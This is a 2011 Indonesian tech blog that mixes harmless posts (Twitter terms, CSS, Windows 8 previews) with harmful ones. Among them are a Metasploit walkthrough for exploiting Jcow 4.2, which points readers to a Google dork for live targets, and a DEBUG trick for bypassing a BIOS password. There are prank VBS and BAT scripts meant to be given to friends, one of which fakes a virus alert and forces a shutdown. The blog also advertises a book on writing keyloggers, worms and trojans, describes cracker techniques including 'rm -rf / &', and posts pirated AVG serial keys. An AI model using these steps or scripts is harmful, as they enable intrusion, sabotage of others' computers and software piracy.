Jumat, 14 Oktober 2011

Sistem Kerja Harddisk

Salah satu komponen penting dalam satu komputer adalah Harddisk. Mengapa demikian, karena semua urusan penyimpanan file akan berada disini. Makin berkembangnya jaman Ukuran ( dimensi ) harddisk akan semakin kecil dengan kapasitas semakin besar.

Tapi tahukan anda bagaimana system kerja suatu harddisk tersebut? Tonton video berikut :

Rabu, 12 Oktober 2011

Arti Dari Istilah Dalam Twitter

Posting kali ini tentang twitter walau banyak orang yang sudah tahu tapi tidak salahnhya di publikasikan kembali,

Berikut kumpulan arti dari istilah yang ada dalam Twitter :


Tweet : Apa yang kita tulis (post) di Twitter, itu yang dinamakan Tweet. Dalam Bahasa Indonesia, Tweet memiliki terjemahan kicauan.


ReTweet : disingkat RT, artinya mengulang, menulis kembali apa yang ditulis seseorang, bisa jadi karena kata-kata tersebut Indah. RT ditambahkan pada tweet diikuti dengan @(username) ditambah dengan kata-kata yang ingin anda ulang.


Following : Artinya Anda akan menerima update status dari teman Anda orang tersebut.


Follower : Orang yang menerima update dari Anda.
Anda bisa mengikuti (following) siapa saja, tapi jangan bingung jika ada simbol seperti “Gembok” disamping nama orang yang akan Anda follow (lihat gambar TheFuzzball dibawah) artinya orang tersebut tidak sembarang menerima Follower karena alasan-alasan tertentu (misal: takut di follow spammer atau menghindari follower yang memakai gambar profil kurang sopan)


@ : Fungsinya bisa untuk me-reply tweet teman, membuat link kepada nama yang dimaksud


Hash Tags : dilambangkan dengan #, gunanya agar pengguna lain yang melihat bisa mencari topik sejenis yang ditulis orang lain dengan mudah. Misal #FollowFriday , #Blogging dll


#FollowFriday : Adalah tradisi setiap hari Jumat dimana Anda dapat merekomendasikan orang lain untuk menjadi follower dari teman Anda yang menyenangkan. Silahkan tulis @(namatemanAnda) yang Anda rekomendasikan pada tweet Anda.


TrendingTopics : Apa topik yang sedang dibicarakan banyak orang? Misal saat kematian Michael Jackson, Michael Jackson menjadi TT (sing. Trending Topics), saat bom mengguncang Indonesia #IndonesiaUnite menjadi topik yang paling sering dibicarakan. Bagaimana suatu tweet bisa menjadi Trending Topics? biasanya karena banyaknya orang yang menggunakan #(topikyangdibicarakan) pada tweetnya. Semakin banyak orang yang membicarakan topik yang sama dengan Anda, semakin lama topik tersebut bertahan pada Halaman depan Twitter dan dilihat oleh seluruh dunia.


OverHeard : Disingkat OH, artinya Anda mendengar (melihat) tweet milik orang lain yang sangat menarik, tetapi Anda tidak ingin menyebutkan siapa yang menulis tweet tersebut. (Berbeda dengan RT yang menyebutkan sumber tweet).


Heard Trough : Dilambangkan dengan HT , tiba-tiba Anda teringat dengan kata-kata menarik yang diucapkan teman Anda kemarin. Anda dapat menulisnya pada tweet dengan HT (singkatan Heard Trough). HT berbeda dengan RT, karena HT adalah kata-kata yang Anda dengar pada kehidupan nyata.


Hanya 140 character : Twitter hanya dapat menulis status yang dibatasi 140 Karakter. Kenapa harus dibatasi? Yah, namanya saja micro-blogging, kalau Anda menulisnya dengan panjang, sebaiknya tulis saja di Blog Anda. Bisa-bisa Follower Anda malah kesal karena Home Feed nya penuh dengan tulisan Anda.


OMG : Oh My God
WTF : What The Fuck
LOL : Lots of Laugh


salam blogger.

Selasa, 11 Oktober 2011

Cara Reset Password BIOS

Dari Wikipedia bahasa Indonesia, ensiklopedia bebas

BIOS, singkatan dari Basic Input Output System, dalam sistem komputer IBM PC atau kompatibelnya (komputer yang berbasis keluarga prosesor Intel x86) merujuk kepada kumpulan rutin perangkat lunak yang mampu melakukan hal-hal berikut:

Inisialisasi (penyalaan) serta pengujian terhadap perangkat keras (dalam proses yang disebut dengan Power On Self Test, POST)
Memuat dan menjalankan sistem operasi
Mengatur beberapa konfigurasi dasar dalam komputer (tanggal, waktu, konfigurasi media penyimpanan, konfigurasi proses booting, kinerja, serta kestabilan komputer)
Membantu sistem operasi dan aplikasi dalam proses pengaturan perangkat keras dengan menggunakan BIOS Runtime Services.

BIOS menyediakan antarmuka komunikasi tingkat rendah, dan dapat mengendalikan banyak jenis perangkat keras (seperti keyboard). Karena kedekatannya dengan perangkat keras, BIOS umumnya dibuat dengan menggunakan bahasa rakitan (assembly) yang digunakan oleh mesin yang bersangkutan.

Istilah BIOS pertama kali muncul dalam sistem operasi CP/M, yang merupakan bagian dari CP/M yang dimuat pada saat proses booting dimulai yang berhadapan secara langsung dengan perangkat keras (beberapa mesin yang menjalankan CP/M memiliki boot loader sederhana dalam ROM). Kebanyakan versi DOS memiliki sebuah berkas yang disebut "IBMBIO.COM" (IBM PC-DOS) atau "IO.SYS" (MS-DOS) yang berfungsi sama seperti halnya CP/M disk BIOS.

Kata BIOS juga dapat diartikan sebagai "kehidupan" dalam tulisan Yunani

Password Bios biasanya digunakan user untuk melindungi setting Bios pada komputer. Bila anda ingin mereset password pada Bios tidak perlu susah-susah untuk mengkoneksikan bateray CMOSnya, dengan sedikit trik pada Dos anda dapat mereset password pada Bios tersebut dengan 2 cara :

1. Clear CMOS
Cara ini kuanggap cara paling kuno sekaligus paling mudah untuk menjebol password pada BIOS. Langkahnya mudah saja, pertama buka casing penutup CPU komputer. Kemudian cari Batere bios yang bentuknya mirip-mirip dengan batere jam cuma sedikit lebih gede. Setelah ketemu perhatikan daerah di sekitar batere biasanya terdapat jumper dengan 3 pin, 2 pin terhubung dan 1 pin tidak.

Misalkan 3 pin tersebut dengan kode 1 - 2 - 3. Posisi konektor awal yang terhubung biasanya adalah 2 - 3. Untuk mereset bios caranya pindahkan posisi konektor yang menghubungkan pin 2 - 3 ke posisi 1 - 2 selama kurang lebih 5 detik. Kemudian pasang kembali ke posisi awal (2 - 3). Coba restart kembali komputer, dijamin password bios sudah lenyap.

Jika cara di atas terlihat rumit, mudahnya untuk menclear cmos adalah dengan mencopot batere BIOS kemudian memasangnya kembali. Namun dengan konsekuensi mencopot label garansi pada batere bios tersebut

2. Melalui DOS
Pertama keluarlah dari windows dengan me restart komputer anda, jalankan komputer pada MS-DOS mode, gunakan pilihan "Command Promt Only"

Pada c:prompt, ketik : DEBUG
tekan enter. Anda akan melihat tanda (-) pada DEBUG promt, kemudian ketik:
o 70 2e
pada DEBUG promt akan ditampilkan seperti -o 70 2e.
tekan enter dan ketik:
-o 71 ff
tekan enter, terakhir ketik:
Q
tekan enter, maka anda akan keluar dari DEBUG promt dan kembali pada C:> prompt.
sekarang restart kembali kompuiter anda, dan lihat hasilnya

Menyembunyikan Drive HardDisk

http://ed-zildjian.blogspot.com

Salah satu hal yang paling mengesalkan adalah saat orang lain dengan seenaknya mengambil data-data di komputer yang dengan susah payah kita kumpulkan. Entah itu foto-foto hasil liputan, MP3 dan sebagainya. Nah, agar mereka tidak bisa berbuat seenaknya, kita bisa menyembunyikan harddisk untuk sementara agar tidak bisa diakses.
Ada beberapa cara yang bisa kita gunakan, salah satunya adalah dengan Diskpart yang merupakan software bawaan OS Windows berbasis teks (command prompt).



1. Buka Start Menu | Run | ketik diskpart lalu tekan Enter.

2. Jendela DOS akan terbuka, ketik list volume lalu tekan Enter.

3. Untuk menyembunyikan Drive D misalnya, pilih dulu volumenya, ketik select volume 3 lalu tekan Enter.

4. Ketik remove letter D lalu tekan Enter (untuk menyembunyikan Drive D, misalnya).

5. Untuk memunculkan kembali Drive D, pilih dulu volumenya (misal ketik : select volume 3) lalu ketikassign letter D lalu tekan Enter.

6. Ulangi cara di atas bila ingin menyembunyikan drive E, F, dan sebagainya. Cara ini memungkinkan kita menyembunyikan beberapa drive sekaligus dalam satu waktu.

Catatan:
Setelah melakukan hal ini, terkadang komputer perlu di-reboot. Jangan khawatir soal data, karena data dalam harddisk yang disembunyikan tetap sama dan tidak hilang. Terakhir, sebaiknya Drive C (tempat sistem operasi Windows berada) tidak disembunyikan.

Ini bisa juga buat jahilin teman yang awam tentang komputer :D
Sebenarnya trik ini sudah jadul dan dikhususkan kepada newbie. Buat mister, master dan mastah yang sudah mengetahuinya mending diam saja...

salam cyber

Minggu, 09 Oktober 2011

Playstation Phone akan menjadi kenyataan

Setelah cukup lama menjadi rumor, Playstation Portable smartphone akhirnya benar-benar akan terjadi dan direncanakan untuk mulai diluncurkan pada awal 2011 berdasarkan laporan dari koran jepang. Handphone ini akan ini akan dibuat Sony Ericsson Mobile Communications dan menjalankan sistem operasi Google Android. Sony tampaknya tergiur dengan pangsa pasar Games yang didapatkan oleh Apple Iphone.

4 Langkah Hacking Kedalam Jcow Social Networking Web Server

Apakah teman-teman blogger pernah melihat CMS yang satu ini?
Jcow social networking...Ya, memang demikian namanya...Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1MB.

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94...
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : "Powered by Jcow 4.2.0". Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : "victim dan password :"victim" pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb(link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder/pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.

msf exploit(jcow) > set rhost 192.168.8.94 --> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set username
username => victim
msf exploit(jcow) > set password victim --> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.


Berhasil

Pengamanan :
1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

Berani belajar hacking?
Mau belajar hacking?
Gabung & Like FB Page ini untuk mendapat informasi terbaru langkah hacking dengan mudah
http://www.facebook.com/computer.hacking.tutorial

Membuat Software Hacking Dengan C++ (Prabayar)

Melanjutkan serial pemrograman C++ untuk hacker, pada buku ini akan lebih dikhususkan lagi pada pembuatan tools atau software-software khusus yang lebih spesifik yang digunakan oleh para hacker.
Software-software atau Tools akan dibuat dengan C++ disertai dengan penjelasan tentang cara kerja dan cara membuatnya.Beberapa software yang dibuat didalam buku ini diantaranya adalah :- DoS, membuat aplikasi yang bisa merontokkan suatu layanan dengan cara menghabiskan sumberdaya yang ada didalamnya.

+ Keylogger, sebuah aplikasi yang bisa digunakan untuk mencuri ketikan keyboard sehingga segala rahasia dan segala informasi yang dimasukkan kedalam komputer bisa diambil tanpa ampun
+ Worm,sebuah aplikasi yang bisa berkembang biak sendiri untuk mendapatkan korban-korban sebanyak mungkin. Aplikasi ini yang seringkali digunakan para hacker untuk mendapatkan pasukan atau zombie yang bisa diperintah sewaktu-waktu.
+ Trojan Horse, sebuah aplikasi yang bisa digunakan untuk mengontrol atau meremote komputer dari jarak jauh. Aplikasi ini yang seringkali digunakan untuk melakukan eksploitasi komputer korban dan melakukan apa saja yang tampaknya tidak mungkin.


Hacking Tidak Hanya Sekedar Teori !


JudulMembuat Software Hacking Dengan C++
PenulisArdy Nursyamsu
ISBN978-979-1090-54-4
HargaRp. 39.000,-
CDYa
eLearningTidak
IndexTidak
Halaman124
LevelBeginner - Middle Level
Download
Terbit2011

sumber : http://www.jasakom.com

Sabtu, 08 Oktober 2011

Ngisengin Kompi orang dengan menggunakan NOTEPAD


Langsung saja Nih Kodenya : 
1. Iseng Mengeject CD-Drive Terus Menerus

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda
2. Iseng Dengan Tombol Enter Terus Menerus

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda
3. Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!”

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda
4. Iseng Dengan Backspace
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda
5. Iseng Dengan Membuka Calculator Terus Menerus
@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top
Kemudian save dengan “SUKASUKAANDA.BAT” & Berikan keteman Anda
6. Iseng Dengan Keyboard
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda
7. Iseng Dengan Shutdown Computer
@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0
Kemudian save dengan “SUKASUKAANDA.BAT” & Berikan keteman Anda
==================================================
Note: Bosen gak ada kerjaan didepan komputer, terlintas untuk berbagi cara ngisengin teman. Teringat masa lalu waktu masih suka ngisengin temen² dengan trik ini :)
Semoga Bermanfaat Ya All.. Salam Hangat Dari Saya.. Kzkz..
Silakan Dikembangkan Sendiri Ide Ide Yang Lainnya.

Thank's to : http://www.binushacker.net

Belajar Menjadi Hacker (Newbie)

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di :
http://www.sans.org
http://www.rootshell.com
http://www.linuxfirewall.org/
http://www.linuxdoc.org
http://www.cerias.purdue.edu/coast/firewalls/
http://www.redhat.com/mirrors/LDP/HOWTO/

Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di :
http://www.iss.net/vd/mail.html
http://www.v-one.com/documents/fw-faq.htm

Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di :
http://bastille-linux.sourceforge.net/
http://www.redhat.com/support/docs/tips/firewall/firewallservice.html

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari :
http://pandu.dhs.org
http://www.bogor.net/idkf/
http://louis.idaman.com/idkf

Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/ . Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk . Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Penulis: Onno W. Purbo

CSS Fundamental (Lesson 2)


Pada buku kedua ini, penulis memberikan materi tentang CSS secara Fundamental. Jadi bagi anda yang baru belajar css, tidak perlu bingung-bingung lagi mencari referensi. Karena buku yang penulis buat juga sudah termasuk "lengkap", beberapa isinya juga penulis dapat dari sumber yang terpercaya seperti: di www.w3schools.com

Daftar isinya kurang lebih sebagai berikut:

BAB I – Pengenalan CSS
- Apa itu CSS?
- Sejarah CSS
- Versi CSS

BAB II – Dasar-Dasar CSS
- Syntax CSS
- Pengelompokkan Selector
- Penggunaan Bebebarapa Property
- Cara Penulisan Syntax Yang Baik
- Komentar Pada CSS

BAB III – Implementasi CSS
- Inline Style Sheet
- Embedded Style Sheet
- External Style Sheet
- Selector Class dan ID

BAB IV – CSS Fundamental
- CSS Styling Background
- CSS Styling Text
- CSS Styling Font
- CSS Styling Link
- CSS Styling List
- CSS Styling Table
- CSS Box Model

BAB V– CSS Reference
- CSS Selector Reference
- CSS Property Reference

Oke, silahkan diunduh. Semoga bermanfaat :)

Thank to : Virgiawan Listanto

Download Tulisan Lengkap

Transform Windows 7 To Neon


Support :
- Windows 7
- X86(32Bit) & X64(64Bit)
- Best Work in X86(32Bit)
- All Language Versions

DOWNLOAD
ZIP download, 15.6 MB

Kamis, 06 Oktober 2011

Free Download Windows 8 (full version)

Windows 8 logo Free Download Windows 8 Full VersionKabar gembira untuk penggemar Windows yang telah sabar menunggu diluncurkannya Windows 8 Developer Preview. Kita dapat mendownloadnya dari pengembang Windows 8 langsung dari microsoft mulai tanggal 14 september 2011 (14/9/2011 03:00 WIB). Kita dapat mendownload Windows 8 ISO Asli Developer Preview.
Windows 8 Developer Preview ini tersedia dalam versi x86 (32bit) dan x64 (64bit). Dalam rilis ini juga tersedia contoh aplikasi (dengan catatan hanya ilustrasi dari aplikasi potensial, tidak ada aplikasi yang akan dirilis bersama didalam windows 8 nantinya). File ISO semua terdapat di http://dev.windows.com
Harap dicatat bahwa upgrade dari versi windows 7 tidak dapat dilakukan, hanya instalasi bersih yang didukung dalam versi ini.
Kita tidak perlu mengaktifkan versi windows 8 developer preview ini, cukup download, install dan gunakan generasi berikutnya Windows 8 ini. Windows 8 Developer Preview sekarang tersedia untuk di download pada link di akhir artikel ini, Developer previewnya tersedia dalam tiga versi:
  • Windows Developer Preview dengan developer tools (x64)
  • Windows Developer Preview English (x64)
  • Windows Developer Preview English (x86)



Windows Developer Preview dengan developer tools (x64)
DOWNLOAD (4.8 GB)
Windows Developer Preview English, 64-bit (x64)
DOWNLOAD (3.6 GB)
Windows Developer Preview English, 32-bit (x86)
DOWNLOAD (2.8 GB)
Terimakasih telah berkunjung, segera Download Windows 8 Full Version

Rabu, 05 Oktober 2011

Seminar Motivasi ( SEMOT ) BSI TA 2011

Sebuah lingkungan yang kondusif akan menciptakan pola pikir dan prilaku yang positif. Lingkungan yang positif akan menghasilkan komunitas yang positif. Penciptaan komunitas positif ini dimulai dengan adanya pembangunan pola pikir (mindsetting). Komunitas BSI adalah manusia yang mempunyai masa depan yang cerah, sehingga pola pikir ini akan mempengaruhi pola perilaku yang selalu mengarah pada pencapaian cita-cita dan penciptaan lingkungan yang positif. Penciptaan midsetting ini akan mempengaruhi pola interaksi antara komponen-komponen terkait di lingkungan kampus BSI.
Untuk menciptakan midsetting ini perlu adanya penyamaan presepsi dan cara pandang, sehingga perlu adanya pembekalan awal bagi mahasiswa BSI. Pembekalan ini akan dikemas dalam suatu trainning motivasi yang diberikan sebelum mahasiswa memasuki masa perkuliahan. Diharapkan mahasiswa yang sudah mengikuti pelatihan ini akan menjadi pribadi yang positif, pribadi yang saling menghargai dan pribadi yang mempunyai visi serta masa depan yang cerah.
Acara inipun di gelar di Istora Senayan yang di bagi menjadi 2 hari pada tanggal 17 dan 18 September 2011 yang di mulai pada pukul 07.00 sampai jam 17.00 ,dibagi 2 hari karena Istora Senayan tidak mampu menampung mahasiswa BSI yang sebegitu banyaknya.

Sabtu, 01 Oktober 2011

AAA logo maker + SN

Ini dia satu lagi software bagi Anda yang suka membuat logo, aplikasi ini sangat ringan file yang hanya

berukuran 7,7 MB plus di lengkapi Serial Number didalamnya.
jika anda ingin mencobanya download disini gratis !!.
kereasikan logo anda dan buat semuanya mudah....

Serial Number AVG 2012

Bagi anda yang mencari SN AVG 2012 ini saya kasih,
pilih salah satu saja SN AVG 2012 ini berguna untuk mengaktifkan fitur-fitur yang di berikan AVG untuk PC anda, biasanya untuk mengaktifkan fitur-fitur AVG 2012 itu prabayar.. tetapi dengan mengunakan SN ini maka otomatik fitur-fitur itu langsung aktif dan mencegah PC anda dari gangguan virus yg terkutuk.. hahaha
ini SN nya:

  • 8MEH-R2CML-SS7FW-MOXFR-TXSKS-3EMBR-ACED
  • 8MEH-RCKOP-BP9KK-YW8EA-6V6VM-SEMBR-ACED